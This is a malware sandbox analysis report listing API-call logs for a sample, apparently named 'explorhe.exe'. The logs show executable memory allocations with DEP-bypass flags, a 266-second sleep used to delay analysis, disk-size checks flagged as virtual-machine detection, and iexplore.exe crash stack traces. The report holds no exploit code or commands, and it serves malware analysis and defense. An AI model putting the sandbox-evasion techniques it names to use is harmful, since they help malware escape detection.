NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 1792 region_size: 114688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2724 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 region_size: 15405056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73423000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76af9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ac2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75602000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2776 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:56 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x713e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 region_size: 6950912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02270000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73423000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76af9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ac2000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

explorhe.exe tried to sleep 266 seconds, actually delayed analysis time by 266 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (23 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 23, 2024, 7:55 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceExW Jan. 23, 2024, 7:56 a.m.	total_number_of_free_bytes: 9859653632 free_bytes_available: 9859653632 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 23, 2024, 7:56 a.m.	total_number_of_free_bytes: 9934028800 free_bytes_available: 9934028800 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 23, 2024, 7:56 a.m.	total_number_of_free_bytes: 10011496448 free_bytes_available: 10011496448 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 23, 2024, 7:56 a.m.	total_number_of_free_bytes: 10011496448 free_bytes_available: 10011496448 root_path: C: total_number_of_bytes: 34252779520	1	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2776 crashed
__exception__ Jan. 23, 2024, 7:56 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 103673428 registers.edi: 79945484 registers.eax: 103673428 registers.ebp: 103673508 registers.edx: 4164878962 registers.ebx: 103673792 registers.esi: 2147746133 registers.ecx: 79678152	1	0	0
__exception__ Jan. 23, 2024, 7:56 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x729b540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x729b52ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72a90ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 71818224 registers.edi: 1974991376 registers.eax: 71818224 registers.ebp: 71818304 registers.edx: 1 registers.ebx: 5460556 registers.esi: 2147746133 registers.ecx: 2082696782	1	0	0

Application Crash

Process iexplore.exe with pid 2776 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Jan. 23, 2024, 7:56 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 103673428
registers.edi: 79945484
registers.eax: 103673428
registers.ebp: 103673508
registers.edx: 4164878962
registers.ebx: 103673792
registers.esi: 2147746133
registers.ecx: 79678152

__exception__

Jan. 23, 2024, 7:56 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x729b540c
